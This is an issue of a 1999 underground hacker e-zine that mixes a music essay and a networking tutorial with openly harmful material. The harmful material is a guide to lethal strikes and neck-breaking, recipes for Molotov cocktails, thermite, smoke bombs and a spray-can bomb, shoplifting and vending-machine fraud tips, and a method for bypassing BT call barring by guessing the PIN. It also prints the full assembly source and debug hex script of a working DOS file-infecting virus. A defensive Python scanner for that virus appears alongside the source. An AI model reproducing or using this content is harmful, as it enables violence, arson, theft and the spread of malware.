UNDERGROUND PERIODICAL
"We're On The Up And Up"

:..:..::..Issue..::..:..:
Issue 7 - November 1999

:..:..::..Staff..::..:..:
CrossFire - Editor
ergophobe (Walrus) - Editor
Mirage - Writer
Devlin - Writer
Pyr0 Proxy / PoZ-i - Writer

Website: http://members.xoom.com/under_p

:..:..::..Email..::..:..:
under_p@yahoo.com

:.:.Alternative Hosts.:.:
http://www.swateam.org
http://surf.to/maquishacker
http://surf.to/awol4life
http://mobboss.dragx.cx
http://walrus.bog.net
http://packetstorm.securify.com

:..::..Introduction.::..:

<*> Welcome to Up7! A lot of things have changed this month: three more people (Mirage, Devlin and Pyr0 Proxy) have joined the staff. Walrus has also been promoted to co-editor because he kept coming up with such good ideas that it was the most sensible thing to do. Darkflame has been kicked from the Up staff because of inactivity.

We didn't get ANY mails concerning Up6 in the past month, so get your asses into gear and tell us what you think.

I'm sorry if the issue was released a bit late this month; this month I've had to chase people to write us articles (more than usual). Heck, we even have a couple of articles from HuSoft (damned good articles too), who was the main 'character' in last month's IP Spanking feature.

Official Cool Person Of The Month: Phreakazoid - for giving me a nice shiny BT Internet dialup :)

Right, on with the mag. Please send feedback and articles to: under_p@yahoo.com - most articles sent to us do get included, and you can plug your website at the end of it if you want.
:..::.:..Contents.:.::..: <*> 0 - Introduction And Contents...: CrossFire <*> 1 - Unarmed Hand To Hand Combat.: Pyr0-Proxy <*> 2 - Tracking Corner.............: Ergophobe <*> 3 - Random Anarchy..............: PoZ-i <*> 4 - Networking..................: Mirage <*> 5 - BT Call Barring.............: CrossFire <*> 6 - Pity Virus..................: EXE-Gency <*> 7 - Gelf Virus..................: EXE-Gency <*> 8 - Hacking Novell Netware......: HuSoft <*> 9 - Password Security...........: HuSoft <*> 10 - Tracked Music Reviews.......: Walrus & CrossFire <*> 11 - 0800 Scans..................: Ergophobe <*> 12 - Eggdrop Hacking.............: Mob Boss <*> 13 - Free Calls with Ureach......: Mob Boss <*> 14 - Playstation Piracy..........: CrossFire <*> 15 - Disclaimer and End..........: UP Staff _____ _____ ___ ___ __ __ / | \| _ \ \ \/ /| | | / \ __/ \ / | | | \ / | \ / | | | \_____/|__| \/ |__|__| PRESENTS: Unarmed Hand To Hand Combat Part 1 - Attacking By Pyr0-Pr0xy First of all, let me say that none of the techniques described here should be used on innocent, defenceless people. Unless you don't like them. "Attack is the best form of defence" - Sometimes this can be true, and sometimes you might just want to kick the shit out of someone. The following text should be useful. There are seven areas of your body, which can be used to attack another person: 1) The Knee 2) The Heel of the foot 3) The ball of the foot 4) Middle finger and ring finger end 5) Elbow 6) The knife edge of hand/little finger 7) The Fist/side fist A fundemental rule, which has to be observed after an attack using any part of the body, is that you must immediately bring back the attacking limb to its starting point. E.g, when you hit someone, you should make contact, then bring your arm back. If you don't, it greatly reduces the effectiveness of the attack. When attacking someone, (in defence of course), there are certain areas of the body that you should always aim to hit. 
A blow to one of these areas can bring down a man much quicker than repeated blows to an inneffective area. They are: The top of the head - not very useful, unless you have a baseball bat. Between the Eyes - Can be poked, or struck with the fist. Causes pain and can break the neck if done with sufficient force. The temples - A sideways blow, with the little finger edge of the hand, to either temples, or both can cause unconsciousness, and even death. Behind the ears - If your opponent is already on the ground, and at your mercy, you can inflict great pain by pressing the knuckle of you second finger into the flesh part just behind the ear lobe The upper lip - This can be hit with the little finger edge of the hand, and with the fist, and causes extreme pain, due to a bundle of nerves being close to the skin Chin - Can be attacked with the fist or elbow, and can knock someone out if hit with enough force Neck - If you manage to hit someone in the throat, just above the voice box, it tends to fold the windpip inwards, which isn't a good thing for the owner of the throat. Pit of the stomach - This spot can be hit with the fist, elbow, knee or can be kicked. It is one of the most vunerable sopts on the body. When kicking your opponent in this spot, keep the toes curved and deliver the blow with the ball of the foot. Withdraw the foot instantly, to delvier maximum force. The Lower ribs - This hurts like hell, and can cause internal damage. Stuck with the foot, and the fist. About 5cm below the navel - Kick this. Hard. It Hurts. Lots. Testicles - Does this really need explanation???!?! Knee Joint - It can be kicked, from the side, with a downward motion, which snaps the joint. Generally, there is not many technical techniques that can be used when attacking, that actually work. Your best bet is to attack first, attack fast, and attack hard. Don't stop attacking until your opponent is on the floor, and not moving, and you will be safe from retalliation. 
Surprise attacks work best, as your opponent has little or no time to prepare himself. If you *really* don't like someone ;-) , then it is quite simple to kill someone with your bare hands. The main area of weakness is the head and neck. The skull is designed to take shocks fowards and backwards, not sideways. So, a violent sideways blow can, if delivered with sufficient force, kill a person. It should at least render them unconscious. Breaking a persons neck is a very quick and easy way to send them to their doom. The easiest way to acheive this from behind is to wrap your right arm around around the right side of their head, across the forehead, grasping the left side of their head, and with your left arm, go across your body, and grab the back, right side of their head. Move your hand closer together, with a violent lunge, twisting their head with a sideways motion. Alternatively, you can place your left hand in the pit of their neck, then grab their forehead with your right hand. Push forwards with your left, and backwards with your right. Finally, let me just say that when attacking, you should always look for weak spots on your opponents body(s). Each person will have a weak spot, some place on their body that you can exploit. Next time, I will be dealing with how to cover up *your* weak spots, and how to react to, and defend from different attacks. _____ _____ ___ ___ __ __ / | \| _ \ \ \/ /| | | / \ __/ \ / | | | \ / | \ / | | | \_____/|__| \/ |__|__| PRESENTS: Tracking corner ~~~~~~~~~~~~~~~ By: ergophobe Hopefully this will turn into a regular feature as a kind of forum for general information/rants and raves about tracking. The basic theme I'm going to be exploring this month is the idea of realism within tracked music. Up until the advent of computers, musicians have been very limited in what they can do with their music. 
Simple things such as having only two arms have greatly influenced the way that instruments, and consequently music, have been structured. But all that has changed. Using a tracker, we can now have things which were never possible before, such as snare fills and hi-hats at the same time, or playing three notes simultaneously on a flute. This has dramatically shaped the music of our time. Many of the sounds which are used in music today, particularly trance, are only possible because of synthesisers and the sounds and effects which these can create. The reason that we have music such as hardcore, techno and drum 'n' bass is because we can. Music such as this is very technology driven, and advances in the technology which is available are being taken advantage of all the time.

However, this is not always a good thing. The classic example is that timestretching samples is now incredibly easy, which has probably led to the huge increase in the number of ripoffs being released at the moment in the hardcore scene.

Less obvious is the fact that people often forget that these limitations have been lifted. When tracking a piece of techno or hardcore, just about anything goes in terms of the physical limitations of your performers. The only thing you need to worry about is a nice DJ-friendly intro and outro. However, when tracking a piece of heavy metal, you've got to remember that your drummer cannot play two bass drums and pedal a hi-hat at the same time, because he doesn't have three legs. In this respect, you need to think very carefully about the way that you use a tracker, even down to researching the range of notes that certain instruments can play. For example, piccolos simply do not play low notes.

There is an additional aspect to the idea of physical limitation, which is the idea of speed. You have to think about exactly how fast it is possible for a person to play.
A piece at 350bpm may work fine in a tracker, but when you give it to real musicians to play, its simply not going to work. Finally it is important to consider what variety of the instrument is most appropriate. For most general saxophone parts, alto or tenor is fine, but for those higher notes, soprano is more effective, and for the really low bass parts, a baritone sax is better. To add extra touches of realism, it is worth thinking about how the piece would actually be played. A pianist will not strike each key with exactly the same velocity every time, there will be slight variations in volume. It is also rare that a saxophonist will play each note exactly the same and completely crisp. If you listen very closely, you will notice that it is common for the note to bend slightly. So when you're tracking, take into account the style you are actually composing in, the instruments you are using and what effect you are actually trying to create with them. ergophobeRandom Anarchy by PoZ-i Fun with Fire and Smoke ----------------------- This may sound obvious, but *much* fun can be had with fire. You'd be Surprised at the amount of things that burn exceptionally well, especially with a little help. Here are some ideas. #1) Flame Throwers Take any spray can; hold a lighter by the nozzle, and spray! #2) Car Mayhem Light something, throw it under a car, and wait for the owner to come running! #3) Flour Fire-ball Get a candle and some flour. Light the candle and put some flour in your hand. Try various ways of getting the flour to leave your hand and become dust over the candle flame. The enormous surface area allows all the tiny dust particles to burn all at about the same time creating a fireball effect. #4) Molotov Cocktail This now famous device is easy to make, but deadly when used. Simply take a glass bottle (a milk bottle will do fine) and fill with 3/4 petrol or lighter fluid, and 1/4 oil. Shake this mixture well. 
Dip a piece of torn rag into the mixture, and stuff it into the neck of the bottle. If no rags are available, a tampon works just as well. Light the rag, then throw the bottle, making sure it smashes. The oil makes the mixture stick to surfaces. #4) Fire Fudge Take some flour, and mix it in with petrol. The resulting mixture should have a dough like consistency. You could throw it at a window or wall, and then light, or you could make a modified molotov cocktail with it. (see above) #5) Carrier Bags Take some carrier bags, and stuff then into a crack in a window, or on someone's doorstep. Burn them, and they melt to form a sticky gooey mess that is very hard to remove! #6) Thermite This one needs some before hand preparation, so plan a week ahead. Thermite is basically a material, that when lit, takes advantage of the extremely hot (2200 degrees C) exothermic reaction that is produced when finely powdered aluminum filings are mixed with Ferric Oxide (rust) The two materials should be mixed at a 50/50 ratio, and gently heated until the iron glows red hot. The resulting material, when lit, will burn through most materials, including carbonized steel! It is very difficult to light however, and the best way to do so is using a magnesium strip. #7) Smoke! This crude but effective smoke bomb will produce *a lot* of smoke when made correctly. Simply mix together Potassium Nitrate (also known as Salt Petre) and sugar, in the ratio 3:1. Add some sulfur for some more smoke if necessary. Heat the mixture in a tin can gently, as you don't want a whole batch of this stuff going off in your kitchen. Heat it until the sugar melts. You should now have a white mixture, with sticky lumps in it. Simply throw a camping match in the tin to light! A fuse is recommended, as the amount of smoke this baby produces will turn heads. I know from experience that this is *very* effective! #8) More smoke! This is another way to make lots of smoke, very easily. 
Simply mix 6g of zinc powder with 1g of sulfur powder. Stick a red-hot wire into the mixture, and stand back, as much smoke is produced. #9) Spray-can bomb. This relatively small explosive is perfect if you are short of any 'proper' explosive materials. It uses the gases inside a spray can (butane, propane) to create an mild explosion. You will need: 1) a spray can (WD-40 is best, as the oil is also flammable, but any old deoderant can will do) 2) firelighters (if no firelighters are avaiable, then a bundle of rags soaked in petrol or lighter fluid would work) 3) Something to light it with 4) a large elastic band or piece of string Take the cap and the nozzle off the can, then using the elastic band or string, tie the fire lighters, or your other flammable material to either side of the can. Now light the flammable material, and run! you will have around 30 secs to a minute, depending on what materials you used. When the can heats up enough, it will explode, lighting the contents, and producing a loud bang!, accompanied by a reasonable fireball. The more cans that are used, the louder, and larger the explosion! Stealing -------- Stealing stuff from shops if surprisingly easy, especially if you have a mate to help. Most shop keepers are so dumb they wouldn't notice if you took the till away from under their noses. however, People don't notice stuff, but camera's do. *Never* take anything when in view of a camera, (unless you are on holiday in Germany of course) unless you want to get caught. Understand though, there are different types of camera. First there are the ones that are totally fake. These are tricky to spot, but they usually have a 'realistic' flashing light. My advice is don't risk it, there are easier places to rob from. Leave any cameras alone, unless they are the type that don't actually record anything, they just let the shop keeper look at the other end of the shop. 
If these are in place, simply get a friend to distract the dick behind the counter, while you get the stuff. This is probably the best method to steal anything. Get a friend or friends to go in one area of the shop, and look really suspicious. All attention will be diverted to them, while you take the stuff. When taking stuff, the best clothes to wear, are combat trousers (the type with really big pockets in the legs), and any jacket with many pockets, especially the hidden type. Also wear a cap, so that if you are accidentally caught on camera, it will be harder for them to recognize you. If you do happen to notice a shopkeeper following you after you have taken something, simply replace the items on a shelf, any shelf. If they take you in when you still have stuff in your pockets, but you haven't left the shop, simply say that you haven't had the chance to pay, and that you had every intention of paying. Even if you get prosecuted, they won't have any kind of a case against you, as you could have still paid. Coin Vending Machines --------------------- This is an idea to fuck over a coin vending machine: Most modern machines work by passing an electric current through the coin, and judging the value of it by the amount of resistance it offers. So what would happen if you were to pour a salt-water solution into the coin slot? The whole fucking machine would start throwing out money and chocolate randomly! Try it! You'll Like It! A Series On Networking 1) Who is that guy Mirage ? 2) Networking Hello readers of UP, this is my first article for UP and I hope you like it. To those of you who don't know me, you would if you hang on the krash server shame on you. Well you can catch most of us there on the weekend on krash.dyndns.org 6667. These are some of the popular channels #apt, #hdc, #krash, #cocytusUK but keep your eyes open for others. Well some of you are probably wondering who is this guy Mirage ? Well erm... 
in a nutshell, I'm a person very curious about computer security issues and generally anything to do with computers. OK, my first article will be on networking, from the basics to more advanced techniques used; from my experience, anyway. This will be in a long line of articles, so stay tuned!

-Mirage-

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

To start off the series of tutorials, we are first going to take a beginner's look at network topologies. My definition of a network topology is that it is a description of the layout of the communication medium (cabling) and the devices on a network (printers, peripherals, etc.). In this article I will cover the following topologies: point to point, mesh, bus, ring, star and hybrid.

Point to point
--------------
This is a very simple one: basically you have two computers connected to each other via communication media. Obviously routing is not necessary, as this is a simple "point to point" topology. Its main use is for file transferring or two-player Quake. This topology is not really used these days, but I thought I'd mention it.

Mesh
----
A mesh topology basically provides each computer on the network with a point to point connection. In my experience, mesh topologies can most of the time provide fast, reliable data transmission. The reason why meshes aren't so widely used is the simple one that they waste communication channels, which in a growing company would be very impractical. Despite the advantages of having a dedicated connection, the wasting of communication channels just isn't practical.

Bus
---
This is the most commonly used, well, from what I've seen. A bus topology, as its name suggests, uses a single communication medium (usually coaxial) to transmit data. This works pretty simply: short links of cable tap directly into the main bus, simple as I said. At each end of the bus are terminating devices which prevent echoing when the signal reaches the end of the main bus. If you don't know what echoing is, well, it's simple: it would produce the effect of multiple signals on the main bus. I remember a friend had set up a network using this topology and asked me to see why it wasn't working. It was so easy to fault find: it was just a badly made cable that wasn't built right. He said he spent over 3 hours trying to fix the network. The twat even formatted all the computers and started again, DOH! So remember to check your cabling first.

Ring
----
This is a real irritating network: if one computer goes down, so do all of them. Righty then, well, this topology connects computers in a continuous loop. On the upside, signal quality on these networks is good, as the signals are retransmitted by each computer to the next computer and so on; the signal keeps getting relayed. The reason why I say this is an upside is that there is very little loss in signal quality, as the signal is always being replayed.

Star
----
Things start to get more interesting here with the introduction of hubs in networks. In a star topology the cabling branches out from a central hub. Then the hub transmits signals from computer to computer, nice huh. If you're not a tight git and you invest in a decent hub, you can pick one up that will increase the signal quality over the network and, wait for it, yes you guessed it, keep portions of the network in operation should a cable break or other problem occur. They're not that expensive to put together actually, and fault finding is so easy. On the downside, it has a low data rate.

Hybrid
------
In my experience I have found that hybrid topologies can be very tricky to establish and manage. Well, hybrid topologies have to combine two or more topologies to be considered a hybrid topology. A lot of wide area networks (WANs) use this topology, as they have the ability to connect several local area networks (LANs).
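To put numbers on the fault-tolerance claims in these descriptions (a ring that loses everything when one station dies, a star whose hub keeps the rest running, a bus hanging off one cable), here is an added Python model written for this issue; it is an illustration, not Mirage's code. It assumes a one-way ring in which each station relays to the next, a bus modelled as one shared "cable" node, a star modelled with a "hub" node, and it counts a pair of stations as working only if traffic can flow both ways between them.

```python
"""Single-failure reachability for the topologies described above.

Added illustration (not the zine's code). Each topology is a set of directed
edges between stations 0..n-1; the bus cable and the star hub are extra nodes.
We remove one node and count surviving station pairs that can still exchange
traffic in both directions.
"""
from itertools import combinations


def ring(n):
    # One-way loop: each station retransmits to the next, as the text says.
    return {(i, (i + 1) % n) for i in range(n)}


def both_ways(pairs):
    # Undirected links, stored as an edge in each direction.
    return {(a, b) for a, b in pairs} | {(b, a) for a, b in pairs}


def bus(n):
    # Every station taps into one shared cable (modelled as a node).
    return both_ways({(i, "cable") for i in range(n)})


def star(n):
    # Every station has its own cable to the central hub.
    return both_ways({(i, "hub") for i in range(n)})


def mesh(n):
    # Every station has a dedicated link to every other station.
    return both_ways(set(combinations(range(n), 2)))


def point_to_point():
    return both_ways({(0, 1)})


def reachable(edges, start, dead):
    """Nodes reachable from `start` along edge direction, avoiding `dead` nodes."""
    seen, stack = {start}, [start]
    while stack:
        node = stack.pop()
        for a, b in edges:
            if a == node and b not in seen and b not in dead:
                seen.add(b)
                stack.append(b)
    return seen


def two_way_pairs(edges, n, dead):
    """Surviving station pairs that can still talk in both directions once
    the nodes in `dead` (station indices, 'hub' or 'cable') are removed."""
    alive = [s for s in range(n) if s not in dead]
    count = 0
    for a, b in combinations(alive, 2):
        if b in reachable(edges, a, dead) and a in reachable(edges, b, dead):
            count += 1
    return count


def survey(n=5):
    """Working pairs per topology after one failure (station 0, the hub, or
    the cable), plus the healthy ring as a baseline."""
    return {
        "ring, all up": two_way_pairs(ring(n), n, set()),
        "ring, one station down": two_way_pairs(ring(n), n, {0}),
        "bus, one station down": two_way_pairs(bus(n), n, {0}),
        "star, one station down": two_way_pairs(star(n), n, {0}),
        "mesh, one station down": two_way_pairs(mesh(n), n, {0}),
        "star, hub down": two_way_pairs(star(n), n, {"hub"}),
        "bus, cable down": two_way_pairs(bus(n), n, {"cable"}),
        "point to point, one end down": two_way_pairs(point_to_point(), 2, {0}),
    }


if __name__ == "__main__":
    for name, pairs in survey().items():
        print(f"{name:32s} {pairs} working pairs")
```

With five stations the healthy ring has ten working pairs and drops to zero as soon as one station stops relaying, while bus, star and mesh keep all six pairs among the four survivors; taking out the hub or the cable instead drops the star or bus to zero, which is the single point of failure a decent hub and good cabling are meant to cover.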
Oh yeah and they can be dame expensive and trouble shooting can really be dawnting. Well readers thats it for this issue stayed tunned for the next issue which we will be looking at communication medium. -Mirage- UIN:54387080 E-mail:dk306@hotmail.com -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Hope You Enjoyed It! Mirage | _> _ _ ___ ___ ___| __><_> _ _ ___ | <__| '_>/ . \<_-<<_-<| _> | || '_>/ ._> `___/|_| \___//__//__/|_| |_||_| \___. Presents.... Bypassing BT Call Blocking v1.0 This file comes about after a phone conversation with Walrus, in which he told me someone had emailed him asking about getting past Bt Call Blocking. Because of a certain £225 Phone Bill, my Parents decided to put Call Blocking on our phoneline. Bastards. From What I can gather, Call Barring works by The Line owner entering a pin (duh), and after which a connection seems to be made to a BT Number, on which a fake dial tone is made. One Way I have found to circumvent this, is If you have a mobile phone or similar, call Up the 17070 Outdial that Ergophobe Mentioned last month (0800 373983) , and select the Cable Pair Identification Feature. Cable Pair Identification basically is a feature that Engineers can use to test lines, cutting off all traffic to the line in the process (And no It doesn't work on freeserve ). From My Findings, this temporarily allows you to make a call, but you have to be quick, because the barring comes back on pretty soon. Another, More Foolproof way to Bypass Call Barring is to try Hacking the Pin Code. From what I've found out, the pin code is 6 numbers long, but the line owner does NOT Select the pin, so don't bother trying your pets second cousins brother in law's wife's birthdate - It aint worth it. 
Once you've hacked the code, you're going to want to deactivate the barring (duh), and to do that you need a special code. Here is a list of all the codes that activate / deactivate various things in the BT system (thanks to EXE-Gency for these):

141 - Withhold number
1471 - Gives details of the last number to call you
1474 - Call the last number to call you
1470 - Un-withhold your number if you have a permanent withhold
150 - BT Customer Service
151 - BT Fault Reporting
155 - International Operator
153 - International Directory Enquiries
192 - UK Directory Enquiries
*21* - Divert all calls
*#21# - Check divert (high tone on / low tone off)
#21# - Cancel divert
*261# - Bars all incoming calls
*#261# - Check incoming call barring
#261# - Cancel incoming call barring
*34x# - Switch ON call barring (where x = option number)
*#34x# - Check call barring
#34x*PIN# - Cancel call barring option
#34*PIN# - Cancel all call bars

Call bar options:
1 - bars almost all calls / allows 999 and 151
2 - bars calls starting with "0"
3 - bars international calls
4 - bars calls starting with 1, except 151
5 - bars calls using *
6 - bars premium rate adult services
7 - bars all premium rate services

*41# - Switch Call Waiting on
#43# - Switch Call Waiting off
*#43# - Check Call Waiting status (high tone on / low tone off)
*52# - Details of last outgoing call (gives number)
#52# - Delete details of last call
*54# - Redial last outgoing call
*61* - Divert if no reply
*#61# - Check divert
#61# - Cancel divert on no reply
*62*xxxxxxxxx# - Divert on NOT AVAILABLE (currently not installed)
*65*xxxxx# - Not sure what this does (needs PIN number)
*66*xxxxxxxxx# - Divert on No Reply and Busy
*67* - Divert if busy
*#67# - Check divert
#67# - Cancel divert on busy

Yeah, short file I know, but I hope you find it useful. Please send all feedback / flames / death threats / bribes to: crossfire@antionline.org .
UP PRESENTS: The Pity Virus
By EXE-Gency

Comment #
THE (PITY) VIRUS BY EXE-GENCY

Okay, this is the very first non-overwriting virus I wrote. Here are some details about the Pity virus:

Name    : Pity
Author  : EXE-Gency
Size    : about 500 bytes (file growth)
Type    : Non-resident, non-overwriting, non-encrypted.
Targets : *.COM
Stealth : Restores file attributes, time and date stamp.
General : Infects all files in the current directory. Searches the current directory with the FindFirst/FindNext functions.
          Won't re-infect files.
          Won't infect files whose first two bytes add up to 167 (such as MZ or ZM in .EXE files).
          Won't infect files smaller than 500 bytes (1F4h).
          Won't infect files larger than 60,000 bytes (EA60h).
          Won't infect files whose name is recognised by the filemask CO*.COM, so as not to infect the file COMMAND.COM.
          Uses the JMP instruction (E9h) as its infection marker.
          Puts the DTA (Disk Transfer Area) at the bottom of the file during execution, so that the parameters to .COM files are not overwritten when the FindFirst (4Eh) and FindNext (4Fh) functions are called.

To assemble, type:
TASM PITY.ASM
TLINK /T PITY.OBJ

DO NOT RUN THE PITY.COM FILE: IT IS THE VIRUS!
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ # Prog segment assume cs:Prog, ds:Prog org 0100h ; Leave room for PSP Begin: db 0E9h, 00h, 00h ; JMP The Start ; (1st generation only) TheStart: call Get_Delta ; Push IP Get_Delta: pop bp ; Pop IP into BP sub bp, offset Get_Delta ; Get File Size lea si, [bp + Buffer] ; SI points to buffer mov di, 0100h ; DI points to 1st byte movsb ; Move 1 byte movsw ; Move 1 word (2 bytes) mov ah, 1Ah ; Set DTA lea dx, [bp + TheEnd] ; To end of virus int 21h ; Do it! mov ah, 4Eh ; FindFirst lea dx, [bp + FileMask] ; DX points to *.COM mov cx, 0007h ; File attribs FindNext: int 21h ; Do it! jnc $+5 ; No error? Continue jmp ReturnToHost ; No more files! mov ax, 4301h ; Set attribs mov cx, 0000h ; To zero lea dx, [bp + TheEnd + 1Eh]; DX points to FileName int 21h ; Do it! jnc $+5 ; No error? Continue jmp FindMore ; Error? Find another mov ax, 3D02h ; Open file R/W lea dx, [bp + TheEnd + 1Eh]; DX points to FileName int 21h ; Do it! jnc $+5 ; No error? Continue jmp FindMore ; Error? Find another xchg ax, bx ; BX=File Handle mov ah, 3Fh ; Read file mov cx, 03h ; 3 bytes lea dx, [bp + Buffer] ; Put in buffer int 21h ; Do it! lea cx, word ptr [bp + offset Buffer] ; Put first 2 bytes into CX add cl, ch ; Add together cmp cl, 0A7h ; Is it MZ or ZM? je RestoreAttr ; Yep, close file cmp byte ptr [bp + Buffer], 0E9h ; Infected? jne $+5 ; No, continue jmp RestoreAttr ; Yep, restore+close cmp word ptr [bp + TheEnd + 1Eh], 'OC' ; COMMAND.COM file? jz RestoreAttr ; Yep, close file mov ax, 4202h ; Goto EOF mov cx, 0000h mov dx, 0000h int 21h ; Do it! sub ax, 03h ; reduce by 3 mov word ptr [bp + JumpBytes+1], ax ; Append offset to JuMP instruction cmp ax, 01F4h ; Less that 500 bytes? jb RestoreAttr ; Yep! Find more cmp ax, 0EA60h ; More than 60,000? ja RestoreAttr ; Yep! Find more mov ah, 40h ; Write file mov cx, TheEnd - TheStart ; CX = Virus size lea dx, [bp + TheStart] ; Beginning of virus int 21h ; Do it! 
mov ax, 4200h ; Set file pointer to start of file mov cx, 0000h mov dx, 0000h int 21h ; Do it! mov ah, 40h ; Write file mov cx, 03h ; 3 bytes lea dx, [bp + JumpBytes] ; DX points to buffer int 21h ; Do it! RestoreAttr: mov ax, 4301h ; Set file attribs mov cx, word ptr [bp + TheEnd + 15h] ; From DTA lea dx, [bp + TheEnd + 1Eh]; DX points to filename int 21h ; Do it! RestoreTDStamp: mov ax, 5701h ; Set file time/date mov cx, word ptr [bp + TheEnd + 16h] ; from DTA mov dx, word ptr [bp + TheEnd + 18h] ; from DTA int 21h ; Do it! CloseFile: mov ah, 3Eh ; Close file int 21h ; Do it! FindMore: mov ah, 4Fh ; Find Next jmp FindNext ; Call int 21h ReturnToHost: mov ah, 2Ch ; Get time int 21h ; Do it! cmp dl, 00h ; sec=0? je DisplayMessage ; Yep, display message Restore: mov ah, 1Ah ; Set DTA mov dx, 80h ; Back to ofs 0080h int 21h ; Do it! mov ax, 0100h push ax ; Push 100h ret ; Ta ta! DisplayMessage: mov ah, 09h ; Display message lea dx, Message ; DX holds offset int 21h ; Do it! int 20h ; Return to OS FileMask db '*.COM', 00h ; ASCIIZ File Mask Message db '[Pity] Virus ' db 'Written by EXE-Gency!' db 0Dh, 0Ah, '$' ; Message Buffer: db 90h, 0CDh, 20h ; NOP, INT 20h JumpBytes db 0E9h, 00h, 00h ; JMP offset TheEnd: ; Where to put DTA Prog ends ; Fin! end Begin ; Fin II ! ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ If you don't have TASM/TLINK, just copy and past the debug script below to a new text file and then type: debug < filename and a file called pity.com will appear. This is the virus. 
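As a defender's counterpart to the listing above, here is an added Python scanner (not EXE-Gency's code and not part of the zine) that reads a .COM file and checks for the two things the infection routine gives away: the E9h marker at offset 0 whose displacement, being the host length minus 3 before the body is appended, lands exactly where the appended code begins, and the plaintext '[Pity] Virus' string. The body length it assumes, 0126h bytes, is read from the `mov cx, TheEnd - TheStart` instruction as encoded in the debug script; the sample host and the "infected" image it builds for its own test are inert constructed byte strings (NOPs plus the string), not the virus.

```python
"""Static checks for a .COM file against the appender infection described
above. Added example: it only reads files, never runs them.
"""
import struct
import sys

PITY_STRING = b"[Pity] Virus"
# Body length from the listing's 'mov cx, TheEnd - TheStart', which the debug
# script encodes as B9 26 01 (0126h = 294 bytes).
BODY_LEN = 0x126
TAIL = 0x200  # an entry jump landing this close to EOF looks "appended"


def jmp_target(data):
    """File offset reached by a leading JMP rel16 (E9h), or None if none.
    A .COM image loads at 0100h; the 3-byte JMP at 0100h continues at
    0103h + disp, which is file offset 3 + disp."""
    if len(data) < 3 or data[0] != 0xE9:
        return None
    disp = struct.unpack_from("<h", data, 1)[0]
    return (3 + disp) & 0xFFFF


def entry_jumps_to_tail(data, tail=TAIL):
    """Appender heuristic: the first instruction jumps into the last `tail`
    bytes of the file. Legitimate .COM programs often start with a JMP too,
    but normally to code near the front, so use this with other evidence."""
    target = jmp_target(data)
    return target is not None and len(data) - tail <= target < len(data)


def scan_com(data):
    """Findings for one .COM image; an empty list means nothing matched."""
    findings = []
    if PITY_STRING in data:
        findings.append("pity-string")
    if entry_jumps_to_tail(data):
        findings.append("entry-jmp-to-tail")
    return findings


def make_clean_host(size):
    """Constructed host: 'mov ah,4Ch / int 21h' (exit) padded with NOPs."""
    prologue = bytes([0xB4, 0x4C, 0xCD, 0x21])
    return prologue + bytes([0x90]) * (size - len(prologue))


def make_infected_image(host):
    """Constructed model of the on-disk layout after infection, for testing
    the scanner only: the host's first three bytes become a JMP whose
    displacement is len(host) - 3, and an inert filler (the string, the
    saved host prologue, NOP padding) of BODY_LEN bytes is appended."""
    disp = len(host) - 3
    patched = bytes([0xE9]) + struct.pack("<H", disp) + host[3:]
    filler = PITY_STRING + host[:3]
    filler += bytes([0x90]) * (BODY_LEN - len(filler))
    return patched + filler


def scan_file(path):
    with open(path, "rb") as fh:
        return scan_com(fh.read())


if __name__ == "__main__":
    if len(sys.argv) > 1:
        for path in sys.argv[1:]:
            print(path, scan_file(path) or "clean")
    else:
        clean = make_clean_host(600)
        print("clean host:", scan_com(clean) or "clean")
        print("model image:", scan_com(make_infected_image(clean)))
```

Run with file names to scan them, or with no arguments to see the constructed host come back clean and the model image trigger both findings; the jump-target check alone is only a hint, the string is the real signature for this particular virus.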
N PITY.COM E 0100 E9 00 00 E8 00 00 5D 81 ED 06 01 8D B6 23 02 BF E 0110 00 01 A4 A5 B4 1A 8D 96 29 02 CD 21 B4 4E 8D 96 E 0120 F8 01 B9 07 00 CD 21 73 03 E9 AE 00 B8 01 43 B9 E 0130 00 00 8D 96 47 02 CD 21 73 03 E9 98 00 B8 02 3D E 0140 8D 96 47 02 CD 21 73 03 E9 8A 00 93 B4 3F B9 03 E 0150 00 8D 96 23 02 CD 21 8D 8E 23 02 02 CD 80 F9 A7 E 0160 74 52 3E 80 BE 23 02 E9 75 03 EB 48 90 3E 81 BE E 0170 47 02 43 4F 74 3E B8 02 42 B9 00 00 BA 00 00 CD E 0180 21 2D 03 00 3E 89 86 27 02 3D F4 01 72 26 3D 60 E 0190 EA 77 21 B4 40 B9 26 01 8D 96 03 01 CD 21 B8 00 E 01A0 42 B9 00 00 BA 00 00 CD 21 B4 40 B9 03 00 8D 96 E 01B0 26 02 CD 21 B8 01 43 3E 8B 8E 3E 02 8D 96 47 02 E 01C0 CD 21 B8 01 57 3E 8B 8E 3F 02 3E 8B 96 41 02 CD E 01D0 21 B4 3E CD 21 B4 4F E9 4B FF B4 2C CD 21 80 FA E 01E0 00 74 0C B4 1A BA 80 00 CD 21 B8 00 01 50 C3 B4 E 01F0 09 BA FE 01 CD 21 CD 20 2A 2E 43 4F 4D 00 5B 50 E 0200 69 74 79 5D 20 56 69 72 75 73 20 57 72 69 74 74 E 0210 65 6E 20 62 79 20 45 58 45 2D 47 65 6E 63 79 21 E 0220 0D 0A 24 90 CD 20 E9 00 00 RCX 0129 W Q _____ _____ ___ ___ __ __ / | \| _ \ \ \/ /| | | / \ __/ \ / | | | \ / | \ / | | | \_____/|__| \/ |__|__| PRESENTS: The Gelf Virus By EXE-Gency Comment # ÉÍÍÍÄÄ ú ú ÄÄÍÍÍ» º ( GELF ) º º b y E X E - G e n c y º 